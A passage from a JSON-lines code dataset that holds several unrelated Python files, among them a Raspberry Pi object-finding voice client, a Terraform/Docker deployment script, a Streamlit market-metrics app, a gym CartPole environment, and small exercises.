= self.a * x1_sample\n y2 = x2_sample / self.a + self.b * (x1_sample ** 2.0 + self.a ** 2.0)\n return (y1, y2)\n\n def cdf(self, y1, y2):\n # invert transform coords\n x1_inv = y1 / self.a\n x2_inv = (y2 - self.b * (x1_inv ** 2.0 + self.a ** 2.0)) * self.a\n pos = np.dstack((x1_inv, x2_inv))\n\n # eval gauss cdf at inv transform coords\n return self.rv_2d_normal.cdf(pos)\n\n\nif __name__ == \"__main__\":\n banana = Banana_2D()\n y1, y2 = banana.rvs(10000)\n plt.figure()\n plt.scatter(y1, y2, s=2, alpha=0.3)\n plt.grid(ls='--', alpha=0.5)\n plt.savefig(\"banana_plot_samples_ex.png\")\n plt.close()\n\n plt.figure()\n y1 = np.linspace(-4, 4, 100)\n y2 = np.linspace(-2, 8, 100)\n y1, y2 = np.meshgrid(y1, y2)\n p = banana.pdf(y1, y2)\n plt.contourf(y1, y2, p)\n plt.grid(ls='--', alpha=0.5)\n plt.savefig(\"banana_plot_pdf_ex.png\")\n plt.close()\n\n plt.figure()\n y1 = np.linspace(-4, 4, 100)\n y2 = np.linspace(-2, 8, 100)\n y1, y2 = np.meshgrid(y1, y2)\n c = banana.cdf(y1, y2)\n plt.contourf(y1, y2, c)\n plt.grid(ls='--', alpha=0.5)\n plt.savefig(\"banana_plot_cdf_ex.png\")\n plt.close()\n","repo_name":"wgurecky/bipymc","sub_path":"bipymc/utils/banana_rv.py","file_name":"banana_rv.py","file_ext":"py","file_size_in_byte":2969,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"35"} +{"seq_id":"2116465783","text":"T = 10\n\ndef solve(num, cnt):\n global a, b, result\n if cnt == b:\n result = num\n return result\n solve(num * a, cnt + 1)\n\n\nfor cnt in range(1, T + 1):\n count = int(input())\n a, b = list(map(int, input().split()))\n solve(a, 1)\n print('#' + str(count) + ' ' + str(result))","repo_name":"Jungwoo-20/Algorithm","sub_path":"SWEA/1217.py","file_name":"1217.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"6962874688","text":"#!/usr/bin/python3\nfrom socketUtils import *\nfrom imutils.video import VideoStream\nfrom parrot import *\nimport argparse\nimport re\nimport time\nimport socket\nimport pickle\nimport uuid\nimport os\n\nCLASSES = {'telephone':1, 'mug':2, 'remote control':3, 'remote':3, 'bottle':4, 'hand':5}\nclass_id = \"class_id\"\nmask = \"mask\"\nroi = \"roi\"\nscore = \"score\"\n\nclass InferenceClient:\n def __init__(self, host, port):\n self.Host = host\n self.Port = port\n self.Server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.Server.connect((host, port))\n\n def GetDetections(self, img_id, frame):\n data = EvaluationData(img_id, frame)\n\n pkg = pickle.dumps(data)\n send_msg(self.Server, pkg)\n\n data = recv_msg(self.Server)\n resp = pickle.loads(data)\n return resp\n\n def Close(self):\n self.Server.close()\n\ndef ip_with_port(arg):\n if re.match(r'\\d{1,3}[.]\\d{1,3}[.]\\d{1,3}[.]\\d{1,3}[:]\\d+', arg):\n return arg\n raise argparse.ArgumentTypeError('Server address must be follow the format \\'0.0.0.0:\\'')\n\ndef play_ready():\n os.system('aplay -q ready.wav')\n\ndef play_error():\n os.system('aplay -q error.wav')\n\ndef get_detection_centre(detection):\n return ( ((detection[roi][3] - detection[roi][1]) / 2) + detection[roi][1], ((detection[roi][2] - detection[roi][0]) / 2) + detection[roi][0] )\n\ndef get_detection_area(detection):\n return (detection[roi][3] - detection[roi][1]) * (detection[roi][2] - detection[roi][0])\n\n# construct the argument parse and parse the arguments\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-s\", \"--server\", required=True, type=ip_with_port, help=\"IP and port of the server being used for detection. Required format - 0.0.0.0:\")\nparser.add_argument(\"-P\", \"--picamera\", action=\"store_true\", help=\"Whether or not the Raspberry Pi camera should be used\")\n\nargs = parser.parse_args()\n\nhost, port = args.server.split(':')\nport = int(port)\nclient = InferenceClient(host, port)\n\n# initialize the video stream and allow the cammera sensor to warmup\nvs = VideoStream(usePiCamera=args.picamera).start()\ntime.sleep(2.0)\n\n###\nlis = Listener()\nspkr = Speaker()\n\nspkr.Queue(\"Hello human\")\nspkr.Say(\"Give me a moment to get organized\")\n\npattern = r\"(?P(where)|(find))\\s*(is)?\\s*(the)?\\s*(?P\\w+)\"\n\ntry:\n lis.GetMicrophone('USB2.0')\nexcept MicrophoneException as e:\n print(str(e))\n spkr.Say(str(e))\n exit(1)\n\nspkr.Say(\"Ok, I'm ready\")\nwhile True:\n lis.ListenForKeyword(['raspberry'])\n play_ready()\n\n grammar_file = 'pi_commands.fsg'\n text = lis.ListenForCommand(grammar_file)\n if not text:\n spkr.Say(\"Sorry, I didn't understand\")\n continue\n\n print(text)\n match = re.match(pattern, text)\n if not match:\n play_error()\n continue\n\n thing = match.group('thing')\n print(thing)\n spkr.Say(\"You are looking for the %s\" % thing)\n\n targetClass = CLASSES[thing]\n # Guidance loop\n while True: # TODO: stop when found\n # Get frame and run it through inferece\n frame = vs.read()\n frame_size = frame.shape\n img_id = uuid.uuid4()\n detections = client.GetDetections(img_id, frame)\n\n # Get best/closer detections when multiple instances\n isHand = False\n centre = [x/2 for x in frame_size]\n print(centre)\n\n lastArea = 0\n target = []\n for detection in detections:\n if detection[class_id] == targetClass:\n area = get_detection_area(detection)\n if area > lastArea:\n lastArea = area\n target = detection\n elif detection[class_id] == CLASSES[\"hand\"]:\n centre = get_detection_centre(detection)\n isHand = True\n\n # If object not in sight, play error\n if not target:\n play_error()\n time.sleep(0.1)\n continue\n\n # Get target vector\n vector_hor = target(0) - centre(0)\n vector_ver = target(1) - centre(1)\n\n horizontal_tolerance = frame_size(0)/3\n vertical_tolerance = frame_size(1)/3\n\n # Queue up directions\n if vector_hor > horizontal_tolerance:\n spkr.Queue(\"Rigth\")\n elif vector_hor < -horizontal_tolerance:\n spkr.Queue(\"Left\")\n\n if vector_ver > vertical_tolerance:\n spkr.Queue(\"Down\")\n elif vector_ver < -vertical_tolerance:\n spkr.Queue(\"Up\")\n\n # Give directions\n spkr.Flush()\n time.sleep(0.1)","repo_name":"pchataignier/masters","sub_path":"raspberry_client.py","file_name":"raspberry_client.py","file_ext":"py","file_size_in_byte":4563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14350308832","text":"def on_received_number(receivedNumber):\n if receivedNumber == 1:\n basic.pause(500)\n servos.P1.set_angle(0)\n basic.pause(500)\n servos.P1.stop()\n strip.show_color(neopixel.colors(NeoPixelColors.RED))\n basic.pause(500)\n elif receivedNumber == 2:\n servos.P1.set_angle(90)\n basic.pause(500)\n servos.P1.stop()\n strip.show_color(neopixel.colors(NeoPixelColors.BLACK))\nradio.on_received_number(on_received_number)\n\ndef on_button_pressed_a():\n radio.send_number(1)\n servos.P1.set_angle(90)\n basic.pause(500)\n servos.P1.stop()\n strip.show_color(neopixel.colors(NeoPixelColors.BLACK))\n OLED.clear()\n OLED.write_string_new_line(\"Lukka\")\n OLED.draw_line(0, 64, 128, 0)\n OLED.draw_line(128, 64, 0, 0)\ninput.on_button_pressed(Button.A, on_button_pressed_a)\n\ndef on_button_pressed_b():\n pass\ninput.on_button_pressed(Button.B, on_button_pressed_b)\n\nstrip: neopixel.Strip = None\nradio.set_group(1)\nled.enable(False)\nstrip = neopixel.create(DigitalPin.P2, 1, NeoPixelMode.RGB)\nOLED.init(128, 64)\n\ndef on_forever():\n if smarthome.read_noise(AnalogPin.P3) > 80:\n radio.send_number(2)\n servos.P1.set_angle(2)\n basic.pause(500)\n servos.P1.stop()\n strip.show_color(neopixel.colors(NeoPixelColors.RED))\n OLED.clear()\n OLED.write_string_new_line(\"Open\")\nbasic.forever(on_forever)\n","repo_name":"NewtonVoss/modul2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"32705819727","text":"import pathlib\nimport docker\nimport argparse\nimport logging\nimport jmespath\nimport json\nimport boto3\nimport base64\nimport sys\n\n\nfrom python_terraform import *\n\nfrom typing import List\n\n# Log to file & stdout\nlogging.basicConfig(filename=\"nginx-system.log\", level=logging.INFO)\nlogging.getLogger().addHandler(logging.StreamHandler())\n\n# GLABOLs\nCWD: pathlib.Path = pathlib.Path().expanduser().resolve()\nDOCKER_PATH: pathlib.Path = CWD.joinpath('nginx-image')\nSERVICE_PATH: pathlib.Path = CWD.joinpath('service')\nDOCKER_CLIENT = docker.from_env()\n\n\ndef create_docker_images_and_push(profile: str, region: str, do_push: bool = False) -> None:\n \"\"\"\n Create images\n \"\"\"\n # Build the current Image\n logging.info(\"Building the Docker Container\")\n DOCKER_CLIENT.images.build(\n path=str(DOCKER_PATH),\n tag=\"nginx-container:latest\",\n quiet=False\n )\n\n # search for a tf state file\n terraform = [p for p in SERVICE_PATH.rglob(\"*.tfstate\")]\n\n if not terraform:\n logging.info(\"Can't get repo name form tfstate file\")\n sys.exit(1)\n\n # load tf state file\n with terraform[0].open(mode='r') as fp:\n tf_state_data = json.load(fp)\n\n # find the repository_url\n list_of_repository_url: List[str] = jmespath.search(\n \"resources[?type=='aws_ecr_repository'].instances | [0][*].attributes.repository_url\",\n tf_state_data\n )\n # check we we're able to get the repo\n if list_of_repository_url:\n repository_url: str = list_of_repository_url.pop(0)\n logging.info(f\"info: repo name is {repository_url}\")\n\n # 1) re-tag with epository_url\n current_image = DOCKER_CLIENT.images.get(\"nginx-container:latest\")\n current_image.tag(f\"{repository_url}:latest\")\n\n # 2) push image to aws\n if do_push:\n sesson = boto3.Session(profile_name=profile, region_name=region)\n ecr_client = sesson.client('ecr')\n\n token = ecr_client.get_authorization_token()\n\n registry_auth = token.get('authorizationData')\n # get auth token for ecr\n if registry_auth:\n try:\n username, password = base64.b64decode(registry_auth[0]['authorizationToken']).decode().split(':')\n repository_name = registry_auth[0]['proxyEndpoint']\n except IndexError as e:\n logging.error(f\"Error - {e}\")\n\n # loging and push the image\n DOCKER_CLIENT.login(username, password, registry=repository_name)\n DOCKER_CLIENT.images.push(f\"{repository_url}:latest\")\n\n\ndef create_terrafrom(profile: str, region: str) -> None:\n \"\"\"\n Create AWS structure from Terraform infrastructure\n :return: AWS Object\n \"\"\"\n logging.info(\"Creating Terraform layout (may take a while...)\")\n terraform = Terraform(working_dir=SERVICE_PATH)\n\n try:\n terraform.cmd(\"init\")\n except FileNotFoundError:\n logging.error(\"Terraform was not found in PATH. Please do so.\")\n sys.exit(1)\n\n terraform.cmd(f\"workspace new tstack\")\n terraform.cmd(f\"workspace select tstack\")\n return_code, _, stderr = terraform.cmd(\n \"apply\",\n vars=f\"profile={profile}\",\n auto_approve=IsFlagged\n )\n\n logging.info(f\"Terraform Exit Code: {return_code}\")\n\n if return_code == 0:\n logging.info(\"new stack created\")\n else:\n if \"ExpiredToken\" in stderr:\n logging.critical(\n \"***token expired, please renew and try again ***\"\n )\n else:\n logging.critical(\n \"*** Ensure aws profile exists***\"\n )\n sys.exit(1)\n\n print(terraform.output())\n\n\ndef clean_up(profile: str, region: str) -> None:\n \"\"\"\n remove everything created and docker images\n :param stack_id: Stack ID to delete\n \"\"\"\n try:\n terraform = Terraform(working_dir=SERVICE_PATH)\n terraform.cmd(\"init\")\n terraform.cmd(f\"workspace select tstack\")\n except (TerraformCommandError, KeyError):\n logging.error(\"workspace doesn't exist\")\n sys.exit(-1)\n\n return_code, stdout, stderr = terraform.cmd(\n \"destroy\",\n var={\n \"profile\": profile,\n \"region\": region\n },\n auto_approve=IsFlagged,\n )\n logging.info(stdout)\n logging.error(stderr)\n\n # docker remove\n if return_code == 0:\n logging.info(f\"ECS Stack tstack destroy complete\")\n \n\ndef parse_args() -> argparse.Namespace:\n \"\"\"\n Parse input args from the user into system args\n :return: Namespace of options\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"-p\",\n \"--profile\",\n type=str,\n required=True,\n default=\"default\",\n help=\"The aws profile you're going to use\"\n )\n parser.add_argument(\n \"-t\",\n \"--type\",\n type=str,\n default=\"run\",\n choices=[\"image\"],\n required=False,\n help=\"\"\"options of to do\n run - will build terraform\n delete - will destroy stacks and rmi docker images\n image - will build the image\n \"\"\"\n )\n parser.add_argument(\n \"-r\",\n \"--region\",\n type=str,\n default=\"us-east-1\",\n required=False,\n help=\"This is the aws region you are using. default is us-east-1\"\n )\n\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n args = parse_args()\n \n # simple two state run\n if args.type == \"run\":\n # apply terrafrom\n create_terrafrom(args.profile, args.region)\n elif args.type == \"image\":\n # build docker image and push to ecr\n create_docker_images_and_push(args.profile, args.region)\n elif args.type == \"clean\":\n clean_up(args.profile, args.region)\n else:\n logging.error(\"Error - invalid selection\")\n","repo_name":"jchamish/nginx-ha-ipaddress","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"26654328357","text":"import pandas as pd\r\nimport streamlit as st\r\nimport numpy as np\r\n\r\n\r\ndef get_avg_price(market_metrics):\r\n avg_prices = market_metrics.groupby('market_id',as_index=False)['median_sale_price'].mean()\r\n return avg_prices\r\n\r\n\r\ndef max_score(score,mid,maxscore,maxid):\r\n st.header(\"Market Hotness Calculator\")\r\n st.text(\"Graph for the Avg sales price and their corresponding market_id\")\r\n st.line_chart(pd.DataFrame(score,mid))\r\n st.text(f\"The max sales {maxscore} has been done by the market id {maxid}\")\r\n st.write(\"\")\r\n st.write(\"\")\r\n st.write(\"\")\r\n\r\n\r\n\r\ndef avg_sales(score,mid,city,mdi):\r\n\r\n st.text(\"The below score is based on Average of the Sales after buying it\")\r\n try:\r\n market_id=st.number_input('Enter the Market ID to get the score')\r\n ind=mid.index(int(market_id))\r\n cind=mdi.index(int(market_id))\r\n st.text(f\"The score is: {score[ind]} and the city where it belongs is {city[cind]}\")\r\n except:\r\n st.warning(\"Sorry, Enter correct Market id\")\r\n\r\n\r\nmarket=pd.read_csv(\"market.csv\")\r\nmarket_metrics=pd.read_csv(\"market_metrics.csv\")\r\nmarket_id=market_metrics.groupby('market_id').count().reset_index()\r\n\r\n\r\n# Removing null values from market dataframe\r\nmarket_nan = market.isnull().sum().sum()\r\nmarket=market.dropna()\r\n\r\n\r\n# Removing the null values and filling missing data present in the market metrics dataframe\r\nmetric_nan = market_metrics['median_list_price_psqft'].isnull().sum().sum()\r\npending_housedata=market_metrics[market_metrics[\"days_to_pending\"].isna() & market_metrics[\"days_to_sell\"].isna()]\r\npending_housedata=pending_housedata[pending_housedata[\"sold_homes_count\"]<5]\r\npending_housedata=pending_housedata[pending_housedata[\"new_listings_count\"]<10]\r\nindices=list(pending_housedata.index)\r\nmetrics=market_metrics.drop(indices)\r\nmetrics.days_to_pending.fillna(metrics.days_to_sell, inplace=True)\r\nmetrics.days_to_sell.fillna(metrics.days_to_pending, inplace=True)\r\n\r\n\r\n# This block is for calculating the avg price score\r\navg_price=get_avg_price(metrics)\r\nprice=pd.DataFrame(avg_price)\r\nscore=list(price[\"median_sale_price\"])\r\nmid=list(price[\"market_id\"])\r\n\r\ncity=list(market['city'])\r\nmdi=list(market['id'])\r\n\r\nmaxscore=max(score)\r\nind=score.index(maxscore)\r\nmaxind=mid[ind]\r\nmax_score(score,mid,maxscore,maxind)\r\navg_sales(score,mid,city,mdi)\r\n\r\n\r\n# This block is for calculating the days of sold\r\n\r\ndef get_avg_day(market_metrics):\r\n avg_prices = market_metrics.groupby('market_id',as_index=False)['days_to_sell'].mean()\r\n return avg_prices\r\n\r\n\r\ndef average_day(score2,mid2,city2,mdi2):\r\n\r\n st.text(\"The below score is based on Average of the the days to sell\")\r\n try:\r\n marid=st.number_input('Enter the Market ID to get the score')\r\n ind=mid2.index(int(marid))\r\n cind=mdi2.index(int(marid))\r\n st.text(f\"The score is: {score2[ind]} and the city where it belongs is {city2[cind]}\")\r\n except:\r\n st.warning(\"Sorry, Enter correct Market id\")\r\n\r\n\r\ndef day_score(score2,mid2,maxscore2,maxid2):\r\n st.write(\"\")\r\n st.write(\"\")\r\n st.write(\"\")\r\n st.text(\"Graph for the Avg days to sell and their corresponding market_id\")\r\n st.line_chart(pd.DataFrame(score2,mid2))\r\n st.text(f\"The max sales {maxscore2} has been done by the market id {maxid2}\")\r\n st.write(\"\")\r\n st.write(\"\")\r\n st.write(\"\")\r\n\r\n\r\navg_day=get_avg_day(metrics)\r\nprice2=pd.DataFrame(avg_day)\r\nscore2=list(price2[\"days_to_sell\"])\r\nmid2=list(price2[\"market_id\"])\r\n\r\ncity2=list(market['city'])\r\nmdi2=list(market['id'])\r\n\r\nmaxscore2=max(score2)\r\nind2=score2.index(maxscore2)\r\nmaxind2=mid2[ind2]\r\nday_score(score2,mid2,maxscore2,maxind2)\r\naverage_day(score2,mid2,city2,mdi2)\r\n\r\n#print(score2)\r\n","repo_name":"NavinAananthan/ZeroDown-Hackathon","sub_path":"algo.py","file_name":"algo.py","file_ext":"py","file_size_in_byte":3714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35469810871","text":"import csv\nfrom excep import excep as ex\nfrom user_interface import user_interface as console\n\n\ndef read_data(path): #Функция, читает данные из файла в список\n \n ex.read_file_except(path)\n with open(path, \"r\") as file:\n reader = csv.reader(file)\n data_list = []\n for row in reader:\n data_list.append(row)\n return data_list\n\t\t\t\n\ndef show_all(path): #Функция, выводит все заметки из указанного .csv файла.\n\n\tlist_ = read_data(path)\n\t\n\tprint('''\\t ID || Имя || Вид ''')\n\tprint('=' * 50)\n\tfor note in list_:\n\t\tprint(f'\\t {note[0]}. || {note[1]} || {note[2]} \\n \\n Список изученных команд: {note[3]}' )\n\tprint('=' * 50)\n\n\ndef selected_filter():\n while (True):\n console.choise_search_filter()\n k = ex.action('пункт')\n if k == \"1\": \n print('-'*50)\n print('Вы выбрали \"По идентификатору\"')\n print('-'*50)\n return 0\n # show_selected_note(path, 0)\n\n elif k == \"2\": \n print('-'*50)\n print('Вы выбрали \"По имени\"')\n print('-'*50)\n return 1\n # show_selected_note(path, 1)\n \n elif k == \"3\": \n print('-'*50)\n print('Вы выбрали \"По виду\"')\n print('-'*50)\n return 2\n # show_selected_note(path, 2) \n\n elif k == \"4\":\n print('-'*50)\n print(\"Производиться выход в главное меню\")\n print('-'*50)\n break\n \n else:\n print('-'*50)\n print(\"Вы ввели неправильные данные\")\n print('-'*50)\n\ndef show_selected_note(path, x):\n\t'''\n\tФункция, выводит информацию о заметках по указанным данным\n\t'''\n \n\tlist_note = read_data(path)\n\tsearch_filter = ex.check_input_string('Введите параметры поиска: ')\n\tfor note in list_note:\n\t\tif search_filter == note[x] in note:\n\t\t\tindex = list_note.index(note)\n\t\t\tprint(list_note[index])\n \n\n \n ","repo_name":"Marassanovad/FinalProject","sub_path":"python/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":2318,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"25763521533","text":"# Write a Python program to create a dictionary of phone numbers and names of five persons. Display the cointents of the dictionary in alphabetical order of names \nph={}\ni=0\nwhile(i<5):\n key = input() \n value = input() \n ph[key] = value\n i=i+1\n\n\n \nsorted_keys = ph.items()\nnew_values = sorted(sorted_keys)\nprint(new_values)","repo_name":"JK432/Dictionary-of-phone-numbers","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"32146170496","text":"import os\nimport cv2\nfrom tqdm import tqdm\nfrom pathlib import Path\n\n\ndef vid2frames(vid_file, save_folder, prefix=\"{:03d}.jpg\"):\n vidcap = cv2.VideoCapture(vid_file)\n success, image = vidcap.read()\n count = 1\n success = True\n while success:\n cv2.imwrite(os.path.join(save_folder, prefix.format(count)),\n image) # save frame as JPEG file\n count += 1\n success, image = vidcap.read()\n\n\nif __name__ == '__main__':\n video_files = sorted(Path(\"dataset/videos/videos\").glob(\"*.mp4\"))\n save_top_folder = Path(\"dataset/videos/frames/\")\n\n if not save_top_folder.exists():\n os.mkdir(str(save_top_folder))\n\n for video_file in tqdm(video_files, desc=\"Number of videos\"):\n save_vid_folder = save_top_folder / video_file.stem\n if not save_vid_folder.exists():\n os.mkdir(save_vid_folder)\n\n if not any(save_vid_folder.iterdir()):\n vid2frames(str(video_file), str(save_vid_folder))\n","repo_name":"hgupta01/Weather_Intensity_Recognition","sub_path":"varg_video2frames.py","file_name":"varg_video2frames.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"34525147398","text":"from collections import deque\n\nn = int(input())\ns = deque([input() for _ in range(n)])\nhistory = {}\n\nfor i in range(n):\n query = s.popleft()\n if(query in history):\n print(query + \"(\" + str(history[query] + 1) +\")\" )\n history[query]+=1\n else:\n print(query)\n history[query]=0\n # print(history)\n","repo_name":"kibutan/Atcoder","sub_path":"ABC261/C - NewFolder(1).py","file_name":"C - NewFolder(1).py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"32636675851","text":"import numpy as np\nimport math\nimport gym\nfrom gym import spaces\nfrom gym.utils import seeding\nfrom os import path\nfrom scipy.integrate import odeint\n\nfrom ..utils import ImageEncoder\nfrom ..gym_wrapper import GymWrapper\n\n__all__ = ['CartPole']\n\nclass GymCartPole(gym.Env):\n metadata = {\n 'render.modes': ['human', 'rgb_array'],\n 'video.frames_per_second': 50\n }\n\n def __init__(self, *args, **kwargs):\n self.gravity = 9.8\n self.masscart = 1.0\n self.masspole = 0.1\n self.total_mass = (self.masspole + self.masscart)\n self.length = 0.5 # actually half the pole's length\n self.polemass_length = (self.masspole * self.length)\n self.max_force = 10.0\n self.tau = 0.02 # seconds between state updates\n\n # Angle at which to fail the episode\n self.theta_threshold_radians = 0.21 #12 * 2 * np.pi / 360\n self.x_threshold = 0.5 #2.4\n\n # Angle limit set to 2 * theta_threshold_radians so failing observation is still within bounds\n high = np.array([\n self.x_threshold * 2,\n np.finfo(np.float32).max,\n self.theta_threshold_radians * 2,\n np.finfo(np.float32).max])\n\n self.action_space = spaces.Box(low=-self.max_force, high=self.max_force, shape=(1,))\n self.observation_space = spaces.Box(-high, high)\n\n self.seed()\n self.viewer = None\n self.state = None\n\n self.steps_beyond_done = None\n\n def seed(self, seed=None):\n self.np_random, seed = seeding.np_random(seed)\n return [seed]\n\n def dynamics(self, st, t, u):\n x, x_dot, theta, theta_dot = st\n # force = np.clip(u, -self.max_force, self.max_force)[0]\n force = u[0]\n # print(force, u)\n costheta = np.cos(theta)\n sintheta = np.sin(theta)\n temp = (force + self.polemass_length * theta_dot * theta_dot * sintheta) / self.total_mass\n thetaacc = (self.gravity * sintheta - costheta* temp) / (self.length * (4.0/3.0 - self.masspole * costheta * costheta / self.total_mass))\n xacc = temp - self.polemass_length * thetaacc * costheta / self.total_mass\n # x = x + self.tau * x_dot\n # x_dot = x_dot + self.tau * xacc\n # theta = theta + self.tau * theta_dot\n # theta_dot = theta_dot + self.tau * thetaacc\n dx = x_dot\n dx_dot = xacc\n dtheta = theta_dot\n dtheta_dot = thetaacc\n return np.array([dx, dx_dot, dtheta, dtheta_dot])\n\n def step(self,action):\n #assert self.action_space.contains(action), \"%r (%s) invalid\"%(action, type(action))\n #print (f\"state {self.counter} : {self.state}\")\n self.counter += 1\n state = self.state\n\n x, x_dot, theta, theta_dot = self.state\n cost = x**2 + theta**2 + x_dot**2 + theta_dot**2 + (action[0]**2)\n\n N = 2\n t = np.linspace(0, self.tau, N)\n self.state = odeint(self.dynamics, self.state, t, args=(action, ))[-1, :]\n # print(self.state)\n # print(action)\n # self.state = self.dynamics(state, action)\n x, x_dot, theta, theta_dot = self.state\n\n done = x < -self.x_threshold \\\n or x > self.x_threshold \\\n or x_dot < -self.x_threshold \\\n or x_dot > self.x_threshold \\\n or theta < -self.theta_threshold_radians \\\n or theta > self.theta_threshold_radians \\\n or theta_dot < -self.theta_threshold_radians \\\n or theta_dot > self.theta_threshold_radians\n done = bool(done)\n\n if not done:\n cost = -1.0\n else:\n cost = 1.0\n\n return self.state, -cost, False, {}\n\n def reset(self):\n self.counter = 0\n self.state = self.np_random.uniform(low=-0.05, high=0.05, size=(4,))\n # self.state = np.array([0.05, 0.05, 0.05, 0.05])\n self.steps_beyond_done = None\n return self.state\n\n def render(self, mode='human'):\n # screen_width = 600\n # screen_height = 400\n\n # world_width = self.x_threshold * 2\n # scale = screen_width/world_width\n # carty = 100 # TOP OF CART\n # polewidth = 10.0\n # polelen = scale * (2 * self.length)\n # cartwidth = 50.0\n # cartheight = 30.0\n\n # if self.viewer is None:\n # from gym.envs.classic_control import rendering\n # self.viewer = rendering.Viewer(screen_width, screen_height)\n # l, r, t, b = -cartwidth / 2, cartwidth / 2, cartheight / 2, -cartheight / 2\n # axleoffset = cartheight / 4.0\n # cart = rendering.FilledPolygon([(l, b), (l, t), (r, t), (r, b)])\n # self.carttrans = rendering.Transform()\n # cart.add_attr(self.carttrans)\n # self.viewer.add_geom(cart)\n # l, r, t, b = -polewidth / 2, polewidth / 2, polelen - polewidth / 2, -polewidth / 2\n # pole = rendering.FilledPolygon([(l, b), (l, t), (r, t), (r, b)])\n # pole.set_color(.8, .6, .4)\n # self.poletrans = rendering.Transform(translation=(0, axleoffset))\n # pole.add_attr(self.poletrans)\n # pole.add_attr(self.carttrans)\n # self.viewer.add_geom(pole)\n # self.axle = rendering.make_circle(polewidth/2)\n # self.axle.add_attr(self.poletrans)\n # self.axle.add_attr(self.carttrans)\n # self.axle.set_color(.5, .5, .8)\n # self.viewer.add_geom(self.axle)\n # self.track = rendering.Line((0, carty), (screen_width, carty))\n # self.track.set_color(0, 0, 0)\n # self.viewer.add_geom(self.track)\n\n # self._pole_geom = pole\n\n # if self.state is None:\n # return None\n\n # # Edit the pole polygon vertex\n # pole = self._pole_geom\n # l, r, t, b = -polewidth / 2, polewidth / 2, polelen - polewidth / 2, -polewidth / 2\n # pole.v = [(l, b), (l, t), (r, t), (r, b)]\n\n # x = self.state\n # cartx = x[0] * scale + screen_width / 2.0 # MIDDLE OF CART\n # self.carttrans.set_translation(cartx, carty)\n # self.poletrans.set_rotation(-x[2])\n\n # return self.viewer.render(return_rgb_array=mode == 'rgb_array')\n print(self.counter, self.state)\n\n def close(self):\n if self.viewer:\n self.viewer.close()\n self.viewer = None\n\n\nclass CartPole(GymWrapper):\n\n environment_name = 'CartPole'\n entry_point = \"marvelgym.openai.cartpole:GymCartPole\"\n max_episode_steps = 50\n reward_threshold = -3.75 # ignore\n\n def __init__(self, **kwargs):\n config = {\n 'image': kwargs.pop('image', False),\n 'sliding_window': kwargs.pop('sliding_window', 0),\n 'image_dim': kwargs.pop('image_dim', 32),\n }\n super(CartPole, self).__init__(config)\n\n # def cost_fn(self, s, a):\n # x, x_dot, theta, theta_dot = s[:,0], s[:,1], s[:,2], s[:,3]\n # return x**2 + theta**2 + x_dot**2 + theta_dot**2 + (np.squeeze(a)**2)\n\n def torque_matrix(self):\n return 2e-4 * np.eye(self.get_action_dim()) #0.002\n\n def make_summary(self, observations, name):\n pass\n\n def is_image(self):\n return self.image\n\n def image_size(self):\n if self.image:\n return [self.image_dim, self.image_dim, 3]\n return None\n\n def start_recording(self, video_path):\n frame_shape = (800, 1200, 3)\n self.image_encoder = ImageEncoder(video_path, frame_shape, 30)\n\n def grab_frame(self):\n frame = self.render(mode='rgb_array')\n self.image_encoder.capture_frame(frame)\n\n def stop_recording(self):\n self.image_encoder.close()\n\n #specifications\n def training_settings(self):\n return {\n \"dp\": False,\n \"ilqr\": False,\n \"trpo\": True,\n \"training_iters\": 1,\n \"learning_rate\": 0.0001,\n \"train_safe\": True,\n \"train_ind\": True,\n \"train_reach\": False,\n \"train_performance\": False,\n \"lb_start\": np.array([-0.05,-0.05,-0.05,-0.05]),\n \"ub_start\": np.array([ 0.05, 0.05, 0.05, 0.05]),\n \"lb_safe\": np.array([-0.5,-0.5, -0.5, -0.5]),\n \"ub_safe\": np.array([ 0.5, 0.5, 0.5, 0.5]),\n \"lb_reach\": np.array([0., 0., 0., 0.]),\n \"ub_reach\": np.array([0., 0., 0., 0.]),\n \"lb_action\": None,\n \"ub_action\": None,\n \"lb_avoids\": None,\n \"ub_avoids\": None,\n }\n","repo_name":"RU-Automated-Reasoning-Group/VEL","sub_path":"training/marvelgym/openai/cartpole.py","file_name":"cartpole.py","file_ext":"py","file_size_in_byte":8558,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"9079670664","text":"import typing\nfrom dataclasses import dataclass\n\nfrom tongsuopy.crypto.ciphers import AEADEncryptionContext, Cipher, CipherContext, algorithms, modes\n\nfrom bkcrypto import constants, types\n\nfrom .. import configs\nfrom ..options import SM4SymmetricOptions\nfrom . import base\n\n\n@dataclass\nclass SM4SymmetricRuntimeConfig(configs.BaseSM4SymmetricConfig, base.BaseSymmetricRuntimeConfig):\n\n mode_class: types.SM4ModeClass = None\n\n def __post_init__(self):\n super().__post_init__()\n\n key_sizes: typing.Set[int] = {key_size // 8 for key_size in algorithms.SM4.key_sizes}\n if self.key_size not in key_sizes:\n raise ValueError(f\"Optional key sizes are {key_sizes}, but got {self.key_size}\")\n\n try:\n self.mode_class = {\n constants.SymmetricMode.CTR: 